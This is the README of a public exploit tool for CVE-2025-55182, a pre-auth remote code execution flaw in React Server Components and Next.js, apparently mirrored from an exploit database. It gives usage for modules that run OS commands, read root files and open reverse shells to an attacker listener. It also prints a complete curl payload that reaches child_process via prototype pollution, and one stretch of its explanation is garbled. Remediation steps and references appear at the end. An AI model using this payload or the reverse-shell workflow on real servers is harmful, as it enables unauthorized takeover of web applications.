Share
## https://sploitus.com/exploit?id=85A9C59F-4F17-551E-A27F-31C45D481C5F
# CVE-2025-55182 β React2Shell
Unauthenticated RCE in React Server Components via insecure deserialization of the Flight protocol. A single HTTP request is enough to execute arbitrary code on the server β no credentials, no prior access needed.
```
_____ __ _ __
/ ___/____ ___ ____ _/ /_| |/ /
\__ \/ __ \/ _ \/ __ `/ __/ /
___/ / /_/ / __/ /_/ / /_/ |
/____/ .___/\___/\__,_/\__/_/|_|
/_/
React Server Components β Flight Protocol RCE
CVE-2025-55182 Β· CVSS 10.0
Author: SpeatX Β· OSCP Style Β· v1.0
```
**CVE-2025-55182** Β· CVSS 10.0 Β· Unauthenticated Β· Pre-auth RCE Β· Disclosed December 3, 2025
Affects React 19 (β€ 19.2.0) and any Next.js application using Server Actions. Default configurations are vulnerable β no custom code needed on the target side.
**Affected versions**
| Package | Vulnerable | Fixed |
|---|---|---|
| `react-server` | 19.0.0 β 19.2.0 | 19.3.0+ |
| `next` | all with React 19 unpatched | 15.0.5 / 15.1.9 / 15.2.6 / 15.3.6+ |
---
## Installation
```bash
git clone https://github.com/SpeatX/react2shell
cd react2shell
pip install requests
```
Python 3.8+ required. No other dependencies.
---
## Usage
```
python exploit.py -t [options]
```
```
Modules:
check Fingerprint target and confirm vulnerability
exec Execute a single OS command and read the output
revshell Send a reverse shell to your listener
Options:
-t, --target URL Target URL
-c CMD Command to run (exec module)
--lhost IP Your IP (auto-detected from tun0 if not set)
--lport PORT Listening port (default: 4444)
--shell-type TYPE bash Β· python3 Β· nc Β· mkfifo Β· node (default: bash)
--proxy URL Route through a proxy (e.g. http://127.0.0.1:8080)
--random-agent Rotate User-Agent on each request
--timeout N Request timeout (default: 15)
```
**Recommended workflow β always start with check:**
```bash
# 1. Confirm the target is vulnerable
python exploit.py check -t http://10.10.11.50
# 2. Run commands to enumerate or grab flags
python exploit.py exec -t http://10.10.11.50 -c "id"
python exploit.py exec -t http://10.10.11.50 -c "cat /root/root.txt"
# 3. Get a shell when you need interactivity
# (start your listener first: nc -lvnp 4444)
python exploit.py revshell -t http://10.10.11.50
python exploit.py revshell -t http://10.10.11.50 --lhost 10.10.14.5 --lport 4444
python exploit.py revshell -t http://10.10.11.50 --shell-type python3 --lport 9001
```
Proxy support and random User-Agent work with any module:
```bash
python exploit.py check -t http://10.10.11.50 --proxy http://127.0.0.1:8080
python exploit.py exec -t http://10.10.11.50 -c "whoami" --random-agent
python exploit.py revshell -t http://10.10.11.50 --proxy http://127.0.0.1:8080
```
Per-module help: `python exploit.py --help`
---
## How it works
### Background
React Server Components communicate using an internal streaming format called the **Flight protocol**. When a browser invokes a Server Action, it sends a `multipart/form-data` POST to the app root with a `Next-Action` header. The server passes the body to the `react-server` package for deserialization before doing anything else β including validating the action ID.
```
Browser Node.js / Next.js
β β
βββ POST / ββββββββββββββββββββββββ>β
β Next-Action: x β
β Content-Type: multipart/form-dataβ
β Body: poisoned Flight chunk β
β β
β react-server β
β resolveModelToJSON() β β vulnerable
β β
β').toString().trim();
throw Object.assign(new Error('NEXT_REDIRECT'), {
digest: `NEXT_REDIRECT;push;/login?a=${res};307;`
});
```
Next.js catches this and converts it to a `307 Temporary Redirect`, embedding the digest in the `X-Action-Redirect` response header. The command output arrives URL-encoded:
```
HTTP/1.1 307 Temporary Redirect
X-Action-Redirect: /login?a=uid%3D0%28root%29%20gid%3D0%28root%29;307;
```
### Manual exploitation with curl
```bash
curl -si -X POST http://TARGET/ \
-H 'Next-Action: x' \
-H 'Content-Type: multipart/form-data; boundary=----Boundary' \
--data-binary $'------Boundary\r\nContent-Disposition: form-data; name="0"\r\n\r\n{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"var res=process.mainModule.require(\'child_process\').execSync(\'id\').toString().trim().replace(/\\\\n/g,\' | \');;throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest:`NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}\r\n------Boundary\r\nContent-Disposition: form-data; name="1"\r\n\r\n"$@0"\r\n------Boundary\r\nContent-Disposition: form-data; name="2"\r\n\r\n[]\r\n------Boundary--\r\n'
```
Output is in the `X-Action-Redirect` header, URL-encoded after `/login?a=`.
---
## Remediation
```bash
npm install react@latest react-dom@latest next@latest
```
Minimum safe: `react-server` β₯ 19.3.0 Β· `next` β₯ 15.3.6
If patching is not immediately possible:
- Set `experimental: { serverActions: false }` in `next.config.js`
- Block the `Next-Action` header at the reverse proxy level
- WAF rule: reject POST bodies containing `NEXT_REDIRECT` or `__proto__`
---
## References
- [NVD β CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)
- [Wiz Research](https://www.wiz.io/blog/critical-vulnerability-in-react-cve-2025-55182)
- [OffSec](https://www.offsec.com/blog/cve-2025-55182/)
- [Microsoft MSTIC](https://www.microsoft.com/en-us/security/blog/2025/12/15/defending-against-the-cve-2025-55182-react2shell-vulnerability-in-react-server-components/)
- [Google GTIG](https://cloud.google.com/blog/topics/threat-intelligence/threat-actors-exploit-react2shell-cve-2025-55182)
---
> For authorized penetration testing and educational purposes only.